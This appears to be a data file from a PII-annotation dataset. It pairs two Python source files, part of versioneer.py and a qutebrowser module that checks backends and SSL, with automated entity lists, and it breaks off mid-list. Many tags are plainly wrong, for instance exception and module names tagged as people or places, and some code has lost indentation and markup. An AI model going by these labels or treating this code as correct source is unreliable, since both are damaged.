print("""")
errors += 1
if setters:
print(""You should remove lines like 'versioneer.VCS = ' and"")
print(""'versioneer.versionfile_source = ' . This configuration"")
print(""now lives in setup.cfg, and should be removed from setup.py"")
print("""")
errors += 1
return errors
if __name__ == ""__main__"":
cmd = sys.argv[1]
if cmd == ""setup"":
errors = do_setup()
errors += scan_setup_py()
if errors:
sys.exit(1)
",72574,"[['PERSON', 'Brian Warner'], ['PERSON', 'NUMCOMMITS.gHASH'], ['DATE_TIME', '0.14'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'configparser'], ['PERSON', 'cfg.versionfile_source = get(parser'], ['PERSON', 'EnvironmentError'], ['PERSON', 'cfg.style'], ['PERSON', 'cfg.versionfile_source'], ['PERSON', 'EnvironmentError'], ['PERSON', 'dirname = os.path.basename(root'], ['PERSON', 'rootdir'], ['PERSON', 'dirname'], ['PERSON', 'dirname[len(parentdir_prefix'], ['PERSON', 'NotThisMethod(""no'], ['LOCATION', 'print(fmt'], ['LOCATION', 'n_seen'], ['DATE_TIME', 'n_seen'], ['LOCATION', '.git'], ['LOCATION', 'cfg.style'], ['PERSON', 'NotThisMethod(""no'], ['LOCATION', 'print(fmt'], ['NRP', 'f.write(""%s'], ['PERSON', 'dirname = os.path.basename(root'], ['PERSON', 'rootdir'], ['PERSON', 'dirname'], ['PERSON', 'dirname[len(parentdir_prefix'], ['PERSON', 'NotThisMethod(""no version_json'], ['PERSON', 'separators='], ['LOCATION', 'n_seen'], ['DATE_TIME', 'n_seen'], ['LOCATION', 'sys.modules'], ['PERSON', 'get_cmdclass'], ['PERSON', 'zipball'], ['PERSON', 'from_keywords_f'], ['PERSON', 'from_vcs_f'], ['LOCATION', 'cfg.style'], ['PERSON', 'get_cmdclass'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['LOCATION', 'sys.modules'], ['PERSON', 'open(cfg.versionfile_source'], ['URL', 'cfg.ve'], ['PERSON', 'cfg.style'], ['PERSON', 'cfg.versionfile_source'], ['LOCATION', 'sys.modules'], ['NRP', 'distutils.command.sdist'], ['PERSON', 'hardlink'], ['PERSON', 'cfg.versionfile_source'], ['PERSON', 'versionfile_build'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'configparser.'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'configparser.'], ['PERSON', 'open(cfg.versionfile_source'], ['PERSON', 'cfg.style'], ['PERSON', 'EnvironmentError'], ['LOCATION', 'MANIFEST.in'], ['PERSON', 'cfg.versionfile_source'], ['URL', 'https://github.com/warner/python-versioneer'], ['URL', 'https://pypip.in/version/versioneer/badge.svg?style=flat'], ['URL', 'https://pypi.python.org/pypi/versioneer/'], ['URL', 'https://travis-ci.org/warner/python-versioneer.png?branch=master'], ['URL', 'https://travis-ci.org/warner/python-versioneer'], ['URL', 'https://creativecommons.org/publicdomain/zero/1.0/'], ['URL', 'https://github.com/warner/python-versioneer'], ['URL', 'https://github.com/warner/python-versioneer/issues/52'], ['URL', 'http://docs.python.org/2/distutils/sourcedist.html#commands'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'versioneer.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'DISTANCE.gS'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'distutils.com'], ['URL', 'versioneer.ge'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'setup.cf'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'MANIFEST.in'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 
'setup.cf'], ['URL', 'setup.py'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.ge'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'untagged.NUMCOMMITS.gH'], ['URL', 'setup.py'], ['URL', 'versioneer.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'DISTANCE.gH'], ['URL', 'details.md'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'version.py'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.VC'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'versioneer.py'], ['URL', 'make-versioneer.py'], ['URL', 'make-versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.py'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.path.jo'], ['URL', 'setup.py'], ['URL', 'os.path.jo'], ['URL', 'versioneer.py'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'setup.py'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'sys.ar'], ['URL', 'os.path.jo'], ['URL', 'setup.py'], ['URL', 'os.path.jo'], ['URL', 'versioneer.py'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'sys.ar'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'os.pa'], ['URL', 'versioneer.py'], ['URL', 'os.path.re'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'versioneer.py'], ['URL', 'os.pa'], ['URL', 'setup.cf'], ['URL', 'setup.cf'], ['URL', 'configparser.No'], ['URL', 'configparser.No'], ['URL', 'versioneer.py'], ['URL', 'setup.cf'], ['URL', 'os.path.jo'], ['URL', 'setup.cf'], ['URL', 'configparser.Sa'], ['URL', 'parser.re'], ['URL', 'parser.ge'], ['URL', 'parser.ge'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'git.cm'], ['URL', 'e.er'], ['URL', 'p.com'], ['URL', 'sys.ve'], ['URL', 'stdout.de'], ['URL', 'p.re'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'setup.py/versioneer.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'git.cm'], ['URL', 'e.er'], ['URL', 'p.com'], ['URL', 'sys.ve'], ['URL', 'stdout.de'], ['URL', 'p.re'], ['URL', 'os.path.ba'], ['URL', 'dirname.st'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'f.re'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'f.cl'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 're.se'], ['URL', 'ref.st'], ['URL', 'version.py'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'sys.pl'], ['URL', 'git.cm'], ['URL', 'out.st'], ['URL', 'out.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'tag.st'], ['URL', 'mo.gr'], ['URL', 'mo.gr'], ['URL', 'pieces.ge'], ['URL', 'DISTANCE.gH'], ['URL', '0.gH'], ['URL', 'untagged.DISTANCE.gH'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', 'part.is'], ['URL', '0.0.0.de'], ['URL', 'pieces.ge'], ['URL', 'replacements.it'], ['URL', 're.ma'], ['URL', 'pieces.ge'], ['URL', 'STYLES.ge'], ['URL', 'version.py'], ['URL', 'cfg.ve'], ['URL', 'os.path.re'], ['URL', 'cfg.ve'], ['URL', 'os.pa'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.pa'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'f.re'], ['URL', 
'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'line.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'f.cl'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 'refnames.st'], ['URL', 'r.st'], ['URL', 're.se'], ['URL', 'ref.st'], ['URL', 'version.py'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'sys.pl'], ['URL', 'git.cm'], ['URL', 'out.st'], ['URL', 'out.st'], ['URL', 're.se'], ['URL', 'mo.gr'], ['URL', 'tag.st'], ['URL', 'mo.gr'], ['URL', 'mo.gr'], ['URL', 'version.py'], ['URL', 'sys.pl'], ['URL', 'git.cm'], ['URL', 'os.pa'], ['URL', 'os.path.re'], ['URL', 'versioneer.py'], ['URL', 'f.re'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'f.cl'], ['URL', 'f.cl'], ['URL', 'os.path.ba'], ['URL', 'dirname.st'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'f.re'], ['URL', 'version.py'], ['URL', 're.se'], ['URL', 'version.py'], ['URL', 'mo.gr'], ['URL', 'version.py'], ['URL', 'pieces.ge'], ['URL', 'DISTANCE.gH'], ['URL', '0.gH'], ['URL', 'untagged.DISTANCE.gH'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', '.post.de'], ['URL', '0.post.de'], ['URL', 'part.is'], ['URL', '0.0.0.de'], ['URL', 'pieces.ge'], ['URL', 'replacements.it'], ['URL', 'name.re'], ['URL', 're.ma'], ['URL', 'pieces.ge'], ['URL', 'STYLES.ge'], ['URL', 'sys.mo'], ['URL', 'cmdclass.py'], ['URL', 'sys.mo'], ['URL', 'cfg.VC'], ['URL', 'setup.cf'], ['URL', 'HANDLERS.ge'], ['URL', 'cfg.VC'], ['URL', 'cfg.VC'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'versioneer.ve'], ['URL', 'os.path.jo'], ['URL', 'cfg.ve'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'handlers.ge'], ['URL', 'handlers.ge'], ['URL', 'handlers.ge'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.pa'], ['URL', 'sys.mo'], ['URL', 'sys.mo'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'sys.mo'], ['URL', 'setup.py'], ['URL', 'sys.mo'], ['URL', 'sys.mo'], ['URL', 'distutils.co'], ['URL', 'vers.ge'], ['URL', 'vers.ge'], ['URL', 'sys.mo'], ['URL', 'setuptools.com'], ['URL', 'distutils.com'], ['URL', 'py.ru'], ['URL', 'version.py'], ['URL', 'cfg.ve'], ['URL', 'os.path.jo'], ['URL', 'cfg.ve'], ['URL', 'sys.mo'], ['URL', 'cfg.ve'], ['URL', 'exe.ru'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'sys.mo'], ['URL', 'setuptools.command.sd'], ['URL', 'distutils.command.sd'], ['URL', 'self.distribution.metadata.ve'], ['URL', 'sdist.ru'], ['URL', 'sdist.ma'], ['URL', 'version.py'], ['URL', 'os.path.jo'], ['URL', 'cfg.ve'], ['URL', 'setup.cf'], ['URL', 'version.py'], ['URL', 'version.py'], ['URL', 'setup.py'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.py'], ['URL', 'setup.cf'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'configparser.No'], ['URL', 'configparser.No'], ['URL', 'configparser.No'], ['URL', 'setup.cf'], ['URL', 'sys.st'], ['URL', 'os.path.jo'], ['URL', 'setup.cf'], ['URL', 'sys.st'], ['URL', 'cfg.ve'], ['URL', 'cfg.ve'], ['URL', 'cfg.VC'], ['URL', 'cfg.st'], ['URL', 'cfg.pa'], ['URL', 'cfg.ve'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'cfg.ve'], ['URL', 'os.pa'], ['URL', 'f.re'], ['URL', 'versioneer.py'], ['URL', 'version.py'], ['URL', 'MANIFEST.in'], ['URL', 'os.path.jo'], ['URL', 'MANIFEST.in'], ['URL', 'line.st'], ['URL', 'includes.ad'], ['URL', 'MANIFEST.in'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'MANIFEST.in'], ['URL', 'versioneer.py'], ['URL', 'versioneer.py'], ['URL', 'MANIFEST.in'], ['URL', 'cfg.ve'], ['URL', 'MANIFEST.in'], ['URL', 'cfg.ve'], 
['URL', 'cfg.ve'], ['URL', 'MANIFEST.in'], ['URL', 'version.py'], ['URL', 'cfg.ve'], ['URL', 'setup.py'], ['URL', 'setup.py'], ['URL', 'f.re'], ['URL', 'found.ad'], ['URL', 'versioneer.ge'], ['URL', 'found.ad'], ['URL', 'versioneer.ge'], ['URL', 'found.ad'], ['URL', 'versioneer.VC'], ['URL', 'versioneer.ve'], ['URL', 'setup.py'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.ge'], ['URL', 'versioneer.VC'], ['URL', 'versioneer.ve'], ['URL', 'setup.cf'], ['URL', 'setup.py'], ['URL', 'sys.ar']]"
109,"# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2017-2021 Florian Bruhin (The Compiler) dummy@email.com
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser.  If not, see <http://www.gnu.org/licenses/>.
""""""Dialogs shown when there was a problem with a backend choice.""""""
import os
import sys
import functools
import html
import enum
import shutil
import argparse
import dataclasses
from typing import Any, List, Sequence, Tuple, Optional
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import (QDialog, QPushButton, QHBoxLayout, QVBoxLayout, QLabel,
QMessageBox, QWidget)
from PyQt5.QtNetwork import QSslSocket
from qutebrowser.config import config, configfiles
from qutebrowser.utils import (usertypes, version, qtutils, log, utils,
standarddir)
from qutebrowser.misc import objects, msgbox, savemanager, quitter
class _Result(enum.IntEnum):
""""""The result code returned by the backend problem dialog.""""""
quit = QDialog.Accepted + 1
restart = QDialog.Accepted + 2
restart_webkit = QDialog.Accepted + 3
restart_webengine = QDialog.Accepted + 4
@dataclasses.dataclass
class _Button:
""""""A button passed to BackendProblemDialog.""""""
text: str
setting: str
value: Any
default: bool = False
def _other_backend(backend: usertypes.Backend) -> Tuple[usertypes.Backend, str]:
    """Get the other backend enum/setting for a given backend."""
    other_backend = {
        usertypes.Backend.QtWebKit: usertypes.Backend.QtWebEngine,
        usertypes.Backend.QtWebEngine: usertypes.Backend.QtWebKit,
    }[backend]
    other_setting = other_backend.name.lower()[2:]
    return (other_backend, other_setting)
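
# Illustrative behaviour (a sketch): the setting name is derived from the
# enum member name with the 'Qt' prefix stripped, e.g.:
#
#   _other_backend(usertypes.Backend.QtWebKit)
#   -> (usertypes.Backend.QtWebEngine, 'webengine')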
def _error_text(because: str, text: str, backend: usertypes.Backend) -> str:
    """Get an error text for the given information."""
    other_backend, other_setting = _other_backend(backend)
    if other_backend == usertypes.Backend.QtWebKit:
        warning = ("Note that QtWebKit hasn't been updated since "
                   "July 2017 (including security updates). ")
        suffix = " (not recommended)"
    else:
        warning = ""
        suffix = ""

    return ("<b>Failed to start with the {backend} backend!</b>"
            "<p>qutebrowser tried to start with the {backend} backend but "
            "failed because {because}.</p>{text}"
            "<p><b>Forcing the {other_backend.name} backend{suffix}</b></p>"
            "<p>This forces usage of the {other_backend.name} backend by "
            "setting the <i>backend = '{other_setting}'</i> option "
            "(if you have a <i>config.py</i> file, you'll need to set "
            "this manually). {warning}</p>".format(
                backend=backend.name, because=because, text=text,
                other_backend=other_backend, other_setting=other_setting,
                warning=warning, suffix=suffix))
class _Dialog(QDialog):
""""""A dialog which gets shown if there are issues with the backend.""""""
def __init__(self, *, because: str,
text: str,
backend: usertypes.Backend,
buttons: Sequence[_Button] = None,
parent: QWidget = None) -> None:
super().__init__(parent)
vbox = QVBoxLayout(self)
other_backend, other_setting = _other_backend(backend)
text = _error_text(because, text, backend)
label = QLabel(text)
label.setWordWrap(True)
label.setTextFormat(Qt.RichText)
vbox.addWidget(label)
hbox = QHBoxLayout()
buttons = [] if buttons is None else buttons
quit_button = QPushButton(""Quit"")
quit_button.clicked.connect(lambda: self.done(_Result.quit))
hbox.addWidget(quit_button)
backend_text = ""Force {} backend"".format(other_backend.name)
if other_backend == usertypes.Backend.QtWebKit:
backend_text += ' (not recommended)'
backend_button = QPushButton(backend_text)
backend_button.clicked.connect(functools.partial(
self._change_setting, 'backend', other_setting))
hbox.addWidget(backend_button)
for button in buttons:
btn = QPushButton(button.text)
btn.setDefault(button.default)
btn.clicked.connect(functools.partial(
self._change_setting, button.setting, button.value))
hbox.addWidget(btn)
vbox.addLayout(hbox)
def _change_setting(self, setting: str, value: str) -> None:
""""""Change the given setting and restart.""""""
config.instance.set_obj(setting, value, save_yaml=True)
if setting == 'backend' and value == 'webkit':
self.done(_Result.restart_webkit)
elif setting == 'backend' and value == 'webengine':
self.done(_Result.restart_webengine)
else:
self.done(_Result.restart)
@dataclasses.dataclass
class _BackendImports:
""""""Whether backend modules could be imported.""""""
webkit_error: Optional[str] = None
webengine_error: Optional[str] = None
class _BackendProblemChecker:
""""""Check for various backend-specific issues.""""""
def __init__(self, *,
no_err_windows: bool,
save_manager: savemanager.SaveManager) -> None:
self._save_manager = save_manager
self._no_err_windows = no_err_windows
def _show_dialog(self, *args: Any, **kwargs: Any) -> None:
""""""Show a dialog for a backend problem.""""""
if self._no_err_windows:
text = _error_text(*args, **kwargs)
print(text, file=sys.stderr)
sys.exit(usertypes.Exit.err_init)
dialog = _Dialog(*args, **kwargs)
status = dialog.exec()
self._save_manager.save_all(is_exit=True)
if status in [_Result.quit, QDialog.Rejected]:
pass
elif status == _Result.restart_webkit:
quitter.instance.restart(override_args={'backend': 'webkit'})
elif status == _Result.restart_webengine:
quitter.instance.restart(override_args={'backend': 'webengine'})
elif status == _Result.restart:
quitter.instance.restart()
else:
raise utils.Unreachable(status)
sys.exit(usertypes.Exit.err_init)
def _nvidia_shader_workaround(self) -> None:
""""""Work around QOpenGLShaderProgram issues.
See https://bugs.launchpad.net/ubuntu/+source/python-qt4/+bug/941826
""""""
self._assert_backend(usertypes.Backend.QtWebEngine)
utils.libgl_workaround()
    def _xwayland_options(self) -> Tuple[str, List[_Button]]:
        """Get buttons/text for a possible XWayland solution."""
        buttons = []
        text = "<p>You can work around this in one of the following ways:</p>"
        if 'DISPLAY' in os.environ:
            # XWayland is available, but QT_QPA_PLATFORM=wayland is set
            buttons.append(
                _Button("Force XWayland", 'qt.force_platform', 'xcb'))
            text += ("<p><b>Force Qt to use XWayland</b></p>"
                     "<p>This allows you to use the newer QtWebEngine backend "
                     "(based on Chromium). "
                     "This sets the <i>qt.force_platform = 'xcb'</i> option "
                     "(if you have a <i>config.py</i> file, you'll need to "
                     "set this manually).</p>")
        else:
            text += ("<p><b>Set up XWayland</b></p>"
                     "<p>This allows you to use the newer QtWebEngine backend "
                     "(based on Chromium). ")
        return text, buttons
def _handle_wayland_webgl(self) -> None:
""""""On older graphic hardware, WebGL on Wayland causes segfaults.
See https://github.com/qutebrowser/qutebrowser/issues/5313
""""""
self._assert_backend(usertypes.Backend.QtWebEngine)
if os.environ.get('QUTE_SKIP_WAYLAND_WEBGL_CHECK'):
return
platform = objects.qapp.platformName()
if platform not in ['wayland', 'wayland-egl']:
return
# Only Qt 5.14 should be affected
if not qtutils.version_check('5.14', compiled=False):
return
if qtutils.version_check('5.15', compiled=False):
return
# Newer graphic hardware isn't affected
opengl_info = version.opengl_info()
if (opengl_info is None or
opengl_info.gles or
opengl_info.version is None or
opengl_info.version >= (4, 3)):
return
# If WebGL is turned off, we're fine
if not config.val.content.webgl:
return
text, buttons = self._xwayland_options()
buttons.append(_Button(""Turn off WebGL (recommended)"",
'content.webgl',
False))
text += (""
Disable WebGL (recommended)
""
""This sets the content.webgl = False option ""
""(if you have a config.py file, you'll need to ""
""set this manually)."")
self._show_dialog(backend=usertypes.Backend.QtWebEngine,
because=(""of frequent crashes with Qt 5.14 on ""
""Wayland with older graphics hardware""),
text=text,
buttons=buttons)
def _try_import_backends(self) -> _BackendImports:
""""""Check whether backends can be imported and return BackendImports.""""""
# pylint: disable=unused-import
results = _BackendImports()
try:
from PyQt5 import QtWebKit
from PyQt5.QtWebKit import qWebKitVersion
from PyQt5 import QtWebKitWidgets
except (ImportError, ValueError) as e:
results.webkit_error = str(e)
else:
if not qtutils.is_new_qtwebkit():
results.webkit_error = ""Unsupported legacy QtWebKit found""
try:
from PyQt5 import QtWebEngineWidgets
except (ImportError, ValueError) as e:
results.webengine_error = str(e)
return results
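
    # Illustrative outcome (a sketch; the error string is hypothetical):
    #
    #   _BackendImports(webkit_error="No module named 'PyQt5.QtWebKit'",
    #                   webengine_error=None)
    #
    # means only QtWebEngine is usable: _check_backend_modules() below then
    # shows a dialog only if the configured backend is the broken QtWebKit,
    # and an error box if both imports had failed.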
def _handle_ssl_support(self, fatal: bool = False) -> None:
""""""Check for full SSL availability.
If ""fatal"" is given, show an error and exit.
""""""
if QSslSocket.supportsSsl():
return
if qtutils.version_check('5.12.4'):
version_text = (""If you use OpenSSL 1.0 with a PyQt package from ""
""PyPI (e.g. on Ubuntu 16.04), you will need to ""
""build OpenSSL 1.1 from sources and set ""
""LD_LIBRARY_PATH accordingly."")
else:
version_text = (""If you use OpenSSL 1.1 with a PyQt package from ""
""PyPI (e.g. on Archlinux or Debian Stretch), you ""
""need to set LD_LIBRARY_PATH to the path of ""
""OpenSSL 1.0 or use Qt >= 5.12.4."")
text = (""Could not initialize QtNetwork SSL support. {} This only ""
""affects downloads and :adblock-update."".format(version_text))
if fatal:
errbox = msgbox.msgbox(parent=None,
title=""SSL error"",
text=""Could not initialize SSL support."",
icon=QMessageBox.Critical,
plain_text=False)
errbox.exec()
sys.exit(usertypes.Exit.err_init)
assert not fatal
log.init.warning(text)
def _check_backend_modules(self) -> None:
""""""Check for the modules needed for QtWebKit/QtWebEngine.""""""
imports = self._try_import_backends()
if not imports.webkit_error and not imports.webengine_error:
return
elif imports.webkit_error and imports.webengine_error:
text = (""qutebrowser needs QtWebKit or QtWebEngine, but ""
""neither could be imported!
""
""The errors encountered were:
""
""QtWebKit: {webkit_error}""
""QtWebEngine: {webengine_error}""
"" "".format(
webkit_error=html.escape(imports.webkit_error),
webengine_error=html.escape(imports.webengine_error)))
errbox = msgbox.msgbox(parent=None,
title=""No backend library found!"",
text=text,
icon=QMessageBox.Critical,
plain_text=False)
errbox.exec()
sys.exit(usertypes.Exit.err_init)
elif objects.backend == usertypes.Backend.QtWebKit:
if not imports.webkit_error:
return
self._show_dialog(
backend=usertypes.Backend.QtWebKit,
because=""QtWebKit could not be imported"",
text=""The error encountered was: {}
"".format(
html.escape(imports.webkit_error))
)
elif objects.backend == usertypes.Backend.QtWebEngine:
if not imports.webengine_error:
return
self._show_dialog(
backend=usertypes.Backend.QtWebEngine,
because=""QtWebEngine could not be imported"",
text=""The error encountered was: {}
"".format(
html.escape(imports.webengine_error))
)
raise utils.Unreachable
def _handle_cache_nuking(self) -> None:
""""""Nuke the QtWebEngine cache if the Qt version changed.
WORKAROUND for https://bugreports.qt.io/browse/QTBUG-72532
""""""
if not configfiles.state.qt_version_changed:
return
# Only nuke the cache in cases where we know there are problems.
# It seems these issues started with Qt 5.12.
# They should be fixed with Qt 5.12.5:
# https://codereview.qt-project.org/c/qt/qtwebengine-chromium/+/265408
if qtutils.version_check('5.12.5', compiled=False):
return
log.init.info(""Qt version changed, nuking QtWebEngine cache"")
cache_dir = os.path.join(standarddir.cache(), 'webengine')
if os.path.exists(cache_dir):
shutil.rmtree(cache_dir)
def _handle_serviceworker_nuking(self) -> None:
""""""Nuke the service workers directory if the Qt version changed.
WORKAROUND for:
https://bugreports.qt.io/browse/QTBUG-72532
https://bugreports.qt.io/browse/QTBUG-82105
""""""
if ('serviceworker_workaround' not in configfiles.state['general'] and
qtutils.version_check('5.14', compiled=False)):
# Nuke the service worker directory once for every install with Qt
# 5.14, given that it seems to cause a variety of segfaults.
configfiles.state['general']['serviceworker_workaround'] = '514'
affected = True
else:
# Otherwise, just nuke it when the Qt version changed.
affected = configfiles.state.qt_version_changed
if not affected:
return
service_worker_dir = os.path.join(standarddir.data(), 'webengine',
'Service Worker')
bak_dir = service_worker_dir + '-bak'
if not os.path.exists(service_worker_dir):
return
log.init.info(""Qt version changed, removing service workers"")
# Keep one backup around - we're not 100% sure what persistent data
# could be in there, but this folder can grow to ~300 MB.
if os.path.exists(bak_dir):
shutil.rmtree(bak_dir)
shutil.move(service_worker_dir, bak_dir)
def _assert_backend(self, backend: usertypes.Backend) -> None:
assert objects.backend == backend, objects.backend
def check(self) -> None:
""""""Run all checks.""""""
self._check_backend_modules()
if objects.backend == usertypes.Backend.QtWebEngine:
self._handle_ssl_support()
self._nvidia_shader_workaround()
self._handle_wayland_webgl()
self._handle_cache_nuking()
self._handle_serviceworker_nuking()
else:
self._assert_backend(usertypes.Backend.QtWebKit)
self._handle_ssl_support(fatal=True)
def init(*, args: argparse.Namespace,
save_manager: savemanager.SaveManager) -> None:
""""""Run all checks.""""""
checker = _BackendProblemChecker(no_err_windows=args.no_err_windows,
save_manager=save_manager)
checker.check()
",17433,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'sw=4'], ['DATE_TIME', '2017-2021'], ['PERSON', 'Florian Bruhin'], ['LOCATION', 'qutebrowser'], ['PERSON', 'qutebrowser'], ['PERSON', 'QPushButton'], ['LOCATION', 'configfiles'], ['PERSON', 'standarddir'], ['LOCATION', 'Result(enum'], ['DATE_TIME', 'July 2017'], ['PERSON', 'vbox'], ['PERSON', 'hbox'], ['PERSON', 'quit_button'], ['LOCATION', 'wayland'], ['LOCATION', 'Wayland'], ['DATE_TIME', 'Only Qt 5.14'], ['PERSON', ""qtutils.version_check('5.15""], ['DATE_TIME', '5.14'], ['LOCATION', 'Wayland'], ['NRP', 'PyQt'], ['NRP', 'PyQt'], ['PERSON', 'text=""Could'], ['DATE_TIME', '5.14'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'https://bugs.launchpad.net/ubuntu/+source/python-qt4/+bug/941826'], ['URL', 'https://github.com/qutebrowser/qutebrowser/issues/5313'], ['URL', 'https://bugreports.qt.io/browse/QTBUG-72532'], ['URL', 'https://codereview.qt-project.org/c/qt/qtwebengine-chromium/+/265408'], ['URL', 'https://bugreports.qt.io/browse/QTBUG-72532'], ['URL', 'https://bugreports.qt.io/browse/QTBUG-82105'], ['URL', 'email.com'], ['URL', 'qutebrowser.co'], ['URL', 'enum.Int'], ['URL', 'QDialog.Ac'], ['URL', 'QDialog.Ac'], ['URL', 'QDialog.Ac'], ['URL', 'QDialog.Ac'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'backend.na'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'backend.na'], ['URL', 'backend.na'], ['URL', 'config.py'], ['URL', 'backend.na'], ['URL', 'usertypes.Ba'], ['URL', 'label.se'], ['URL', 'label.se'], ['URL', 'vbox.ad'], ['URL', 'button.clicked.co'], ['URL', 'self.do'], ['URL', 'hbox.ad'], ['URL', 'backend.na'], ['URL', 'usertypes.Ba'], ['URL', 'button.clicked.co'], ['URL', 'functools.pa'], ['URL', 'hbox.ad'], ['URL', 'btn.se'], ['URL', 'button.de'], ['URL', 'btn.clicked.co'], ['URL', 'functools.pa'], ['URL', 'button.se'], ['URL', 'button.va'], ['URL', 'hbox.ad'], ['URL', 'vbox.ad'], ['URL', 'config.instance.se'], ['URL', 'self.do'], ['URL', 'Result.re'], ['URL', 'self.do'], ['URL', 'Result.re'], ['URL', 'self.do'], ['URL', 'Result.re'], ['URL', 'savemanager.Sa'], ['URL', 'sys.st'], ['URL', 'usertypes.Exit.er'], ['URL', 'manager.sa'], ['URL', 'QDialog.Re'], ['URL', 'Result.re'], ['URL', 'quitter.instance.re'], ['URL', 'Result.re'], ['URL', 'quitter.instance.re'], ['URL', 'Result.re'], ['URL', 'quitter.instance.re'], ['URL', 'usertypes.Exit.er'], ['URL', 'usertypes.Ba'], ['URL', 